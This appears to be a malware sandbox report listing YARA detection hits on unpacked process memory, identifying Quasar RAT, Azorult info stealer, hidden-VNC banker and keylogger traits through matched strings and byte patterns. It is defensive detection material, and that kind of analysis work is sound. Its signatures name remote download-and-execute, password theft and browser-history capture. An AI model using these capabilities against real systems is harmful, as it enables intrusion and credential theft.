1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x66c28:$x4: xClient.Properties.Resources.resources 0x66ae9:$s4: Client.exe 0x7c0da:$s7: set_RunHidden
1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x7c09e:$s1: DoUploadAndExecute 0x819b5:$s2: DoDownloadAndExecute 0x7be74:$s3: DoShellExecute 0x7c296:$s4: set_Processname 0x4a630:$op1: 04 1E FE 02 04 16 FE 01 60 0x4a554:$op2: 00 17 03 1F 20 17 19 15 28 0x4afc1:$op3: 00 04 03 69 91 1B 40 0x4b820:$op3: 00 04 03 69 91 1B 40
1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x7b8f4:$x1: GetKeyloggerLogsResponse 0x7bb34:$s1: DoShellExecuteResponse 0x74f22:$s2: GetPasswordsResponse 0x7ba07:$s3: GetStartupItemsResponse 0x721f0:$s4: <GetGenReader>b__7 0x7c0b2:$s5: RunHidden 0x7c0d0:$s5: RunHidden 0x7c0de:$s5: RunHidden 0x7c0f2:$s5: RunHidden
1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x849cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x84790:$x2: Process already elevated. 0x7d2ef:$x4: get_encryptedPassword 0x819b5:$x5: DoDownloadAndExecute
1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x1db64a:$s1: DoUploadAndExecute 0x1e0f61:$s2: DoDownloadAndExecute 0x1db420:$s3: DoShellExecute 0x1db842:$s4: set_Processname 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28 0x1aa56d:$op3: 00 04 03 69 91 1B 40 0x1aadcc:$op3: 00 04 03 69 91 1B 40
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x1daea0:$x1: GetKeyloggerLogsResponse 0x1db0e0:$s1: DoShellExecuteResponse 0x1d44ce:$s2: GetPasswordsResponse 0x1dafb3:$s3: GetStartupItemsResponse 0x1d179c:$s4: <GetGenReader>b__7 0x1db65e:$s5: RunHidden 0x1db67c:$s5: RunHidden 0x1db68a:$s5: RunHidden 0x1db69e:$s5: RunHidden
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.2.CVbJSUXraQ.exe.ee5bac.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.2.CVbJSUXraQ.exe.ee5bac.2.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.0.CVbJSUXraQ.exe.ee9fac.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.0.CVbJSUXraQ.exe.ee9fac.2.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.cc5c50.4.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.0.svchost.exe.cc5c50.4.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.cc5c50.4.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.cc5c50.4.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
5.0.svchost.exe.c60000.6.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.0.svchost.exe.c60000.6.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c60000.6.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.c60000.6.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
4.2.vnc.exe.ab6000.1.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
4.2.vnc.exe.ab6000.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.vnc.exe.ab6000.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
4.2.vnc.exe.ab6000.1.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
4.2.vnc.exe.ae1000.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
4.2.vnc.exe.ae1000.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.vnc.exe.ae1000.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
4.2.vnc.exe.ae1000.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
5.2.svchost.exe.c9ac50.1.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.2.svchost.exe.c9ac50.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.2.svchost.exe.c9ac50.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.2.svchost.exe.c9ac50.1.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
5.0.svchost.exe.c60000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c60000.0.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.0.CVbJSUXraQ.exe.f14fac.3.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.0.CVbJSUXraQ.exe.f14fac.3.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x91c28:$x4: xClient.Properties.Resources.resources 0x91ae9:$s4: Client.exe 0xa70da:$s7: set_RunHidden
1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa709e:$s1: DoUploadAndExecute 0xac9b5:$s2: DoDownloadAndExecute 0xa6e74:$s3: DoShellExecute 0xa7296:$s4: set_Processname 0x75630:$op1: 04 1E FE 02 04 16 FE 01 60 0x75554:$op2: 00 17 03 1F 20 17 19 15 28 0x75fc1:$op3: 00 04 03 69 91 1B 40 0x76820:$op3: 00 04 03 69 91 1B 40
1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xa68f4:$x1: GetKeyloggerLogsResponse 0xa6b34:$s1: DoShellExecuteResponse 0x9ff22:$s2: GetPasswordsResponse 0xa6a07:$s3: GetStartupItemsResponse 0x9d1f0:$s4: <GetGenReader>b__7 0xa70b2:$s5: RunHidden 0xa70d0:$s5: RunHidden 0xa70de:$s5: RunHidden 0xa70f2:$s5: RunHidden
1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xaf9cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xaf790:$x2: Process already elevated. 0xa82ef:$x4: get_encryptedPassword 0xac9b5:$x5: DoDownloadAndExecute
1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x1db64a:$s1: DoUploadAndExecute 0x1e0f61:$s2: DoDownloadAndExecute 0x1db420:$s3: DoShellExecute 0x1db842:$s4: set_Processname 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28 0x1aa56d:$op3: 00 04 03 69 91 1B 40 0x1aadcc:$op3: 00 04 03 69 91 1B 40
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x1daea0:$x1: GetKeyloggerLogsResponse 0x1db0e0:$s1: DoShellExecuteResponse 0x1d44ce:$s2: GetPasswordsResponse 0x1dafb3:$s3: GetStartupItemsResponse 0x1d179c:$s4: <GetGenReader>b__7 0x1db65e:$s5: RunHidden 0x1db67c:$s5: RunHidden 0x1db68a:$s5: RunHidden 0x1db69e:$s5: RunHidden
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x96028:$x4: xClient.Properties.Resources.resources 0x95ee9:$s4: Client.exe 0xab4da:$s7: set_RunHidden
1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xab49e:$s1: DoUploadAndExecute 0xb0db5:$s2: DoDownloadAndExecute 0xab274:$s3: DoShellExecute 0xab696:$s4: set_Processname 0x79a30:$op1: 04 1E FE 02 04 16 FE 01 60 0x79954:$op2: 00 17 03 1F 20 17 19 15 28 0x7a3c1:$op3: 00 04 03 69 91 1B 40 0x7ac20:$op3: 00 04 03 69 91 1B 40
1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xaacf4:$x1: GetKeyloggerLogsResponse 0xaaf34:$s1: DoShellExecuteResponse 0xa4322:$s2: GetPasswordsResponse 0xaae07:$s3: GetStartupItemsResponse 0xa15f0:$s4: <GetGenReader>b__7 0xab4b2:$s5: RunHidden 0xab4d0:$s5: RunHidden 0xab4de:$s5: RunHidden 0xab4f2:$s5: RunHidden
1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xb3dcc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xb3b90:$x2: Process already elevated. 0xac6ef:$x4: get_encryptedPassword 0xb0db5:$x5: DoDownloadAndExecute
1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
4.0.vnc.exe.ae1000.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.0.vnc.exe.ae1000.2.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.cc5c50.1.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.0.svchost.exe.cc5c50.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.cc5c50.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.cc5c50.1.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
6.2.windef.exe.f10000.0.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x456f4:$x3: GetKeyloggerLogsResponse 0x45bea:$x4: GetKeyloggerLogs 0x45eb1:$s1: <RunHidden>k__BackingField 0x458bc:$s2: set_SystemInfos 0x45eda:$s3: set_RunHidden 0x45ae8:$s4: set_RemotePath 0x56bf8:$s6: Client.exe 0x56c60:$s6: Client.exe 0x4af5b:$s7: xClient.Core.ReverseProxy.Packets
6.2.windef.exe.f10000.0.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x30a28:$x4: xClient.Properties.Resources.resources 0x308e9:$s4: Client.exe 0x45eda:$s7: set_RunHidden
6.2.windef.exe.f10000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45e9e:$s1: DoUploadAndExecute 0x4b7b5:$s2: DoDownloadAndExecute 0x45c74:$s3: DoShellExecute 0x46096:$s4: set_Processname 0x14430:$op1: 04 1E FE 02 04 16 FE 01 60 0x14354:$op2: 00 17 03 1F 20 17 19 15 28 0x14dc1:$op3: 00 04 03 69 91 1B 40 0x15620:$op3: 00 04 03 69 91 1B 40
6.2.windef.exe.f10000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x456f4:$x1: GetKeyloggerLogsResponse 0x45934:$s1: DoShellExecuteResponse 0x3ed22:$s2: GetPasswordsResponse 0x45807:$s3: GetStartupItemsResponse 0x3bff0:$s4: <GetGenReader>b__7 0x45eb2:$s5: RunHidden 0x45ed0:$s5: RunHidden 0x45ede:$s5: RunHidden 0x45ef2:$s5: RunHidden
6.2.windef.exe.f10000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x4e7cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
6.2.windef.exe.f10000.0.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4e590:$x2: Process already elevated. 0x470ef:$x4: get_encryptedPassword 0x4b7b5:$x5: DoDownloadAndExecute
6.2.windef.exe.f10000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x96028:$x4: xClient.Properties.Resources.resources 0x95ee9:$s4: Client.exe 0xab4da:$s7: set_RunHidden
7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xab49e:$s1: DoUploadAndExecute 0xb0db5:$s2: DoDownloadAndExecute 0xab274:$s3: DoShellExecute 0xab696:$s4: set_Processname 0x79a30:$op1: 04 1E FE 02 04 16 FE 01 60 0x79954:$op2: 00 17 03 1F 20 17 19 15 28 0x7a3c1:$op3: 00 04 03 69 91 1B 40 0x7ac20:$op3: 00 04 03 69 91 1B 40
7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xaacf4:$x1: GetKeyloggerLogsResponse 0xaaf34:$s1: DoShellExecuteResponse 0xa4322:$s2: GetPasswordsResponse 0xaae07:$s3: GetStartupItemsResponse 0xa15f0:$s4: <GetGenReader>b__7 0xab4b2:$s5: RunHidden 0xab4d0:$s5: RunHidden 0xab4de:$s5: RunHidden 0xab4f2:$s5: RunHidden
7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xb3dcc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xb3b90:$x2: Process already elevated. 0xac6ef:$x4: get_encryptedPassword 0xb0db5:$x5: DoDownloadAndExecute
7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x96028:$x4: xClient.Properties.Resources.resources 0x95ee9:$s4: Client.exe 0xab4da:$s7: set_RunHidden
10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xab49e:$s1: DoUploadAndExecute 0xb0db5:$s2: DoDownloadAndExecute 0xab274:$s3: DoShellExecute 0xab696:$s4: set_Processname 0x79a30:$op1: 04 1E FE 02 04 16 FE 01 60 0x79954:$op2: 00 17 03 1F 20 17 19 15 28 0x7a3c1:$op3: 00 04 03 69 91 1B 40 0x7ac20:$op3: 00 04 03 69 91 1B 40
10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xaacf4:$x1: GetKeyloggerLogsResponse 0xaaf34:$s1: DoShellExecuteResponse 0xa4322:$s2: GetPasswordsResponse 0xaae07:$s3: GetStartupItemsResponse 0xa15f0:$s4: <GetGenReader>b__7 0xab4b2:$s5: RunHidden 0xab4d0:$s5: RunHidden 0xab4de:$s5: RunHidden 0xab4f2:$s5: RunHidden
10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xb3dcc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xb3b90:$x2: Process already elevated. 0xac6ef:$x4: get_encryptedPassword 0xb0db5:$x5: DoDownloadAndExecute
10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack	Azorult_1	Azorult Payload	kevoreilly	0x3953:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1fb63:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1a88c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") 0x33c94:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
1.3.CVbJSUXraQ.exe.1808408.4.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.3.CVbJSUXraQ.exe.1808408.4.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.2.CVbJSUXraQ.exe.db0000.1.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x1db64a:$s1: DoUploadAndExecute 0x1e0f61:$s2: DoDownloadAndExecute 0x1db420:$s3: DoShellExecute 0x1db842:$s4: set_Processname 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28 0x1aa56d:$op3: 00 04 03 69 91 1B 40 0x1aadcc:$op3: 00 04 03 69 91 1B 40
7.2.CVbJSUXraQ.exe.db0000.1.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x1daea0:$x1: GetKeyloggerLogsResponse 0x1db0e0:$s1: DoShellExecuteResponse 0x1d44ce:$s2: GetPasswordsResponse 0x1dafb3:$s3: GetStartupItemsResponse 0x1d179c:$s4: <GetGenReader>b__7 0x1db65e:$s5: RunHidden 0x1db67c:$s5: RunHidden 0x1db68a:$s5: RunHidden 0x1db69e:$s5: RunHidden
7.2.CVbJSUXraQ.exe.db0000.1.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
7.2.CVbJSUXraQ.exe.db0000.1.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.2.CVbJSUXraQ.exe.db0000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.CVbJSUXraQ.exe.db0000.1.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x96028:$x4: xClient.Properties.Resources.resources 0x95ee9:$s4: Client.exe 0xab4da:$s7: set_RunHidden
10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xab49e:$s1: DoUploadAndExecute 0xb0db5:$s2: DoDownloadAndExecute 0xab274:$s3: DoShellExecute 0xab696:$s4: set_Processname 0x79a30:$op1: 04 1E FE 02 04 16 FE 01 60 0x79954:$op2: 00 17 03 1F 20 17 19 15 28 0x7a3c1:$op3: 00 04 03 69 91 1B 40 0x7ac20:$op3: 00 04 03 69 91 1B 40
10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xaacf4:$x1: GetKeyloggerLogsResponse 0xaaf34:$s1: DoShellExecuteResponse 0xa4322:$s2: GetPasswordsResponse 0xaae07:$s3: GetStartupItemsResponse 0xa15f0:$s4: <GetGenReader>b__7 0xab4b2:$s5: RunHidden 0xab4d0:$s5: RunHidden 0xab4de:$s5: RunHidden 0xab4f2:$s5: RunHidden
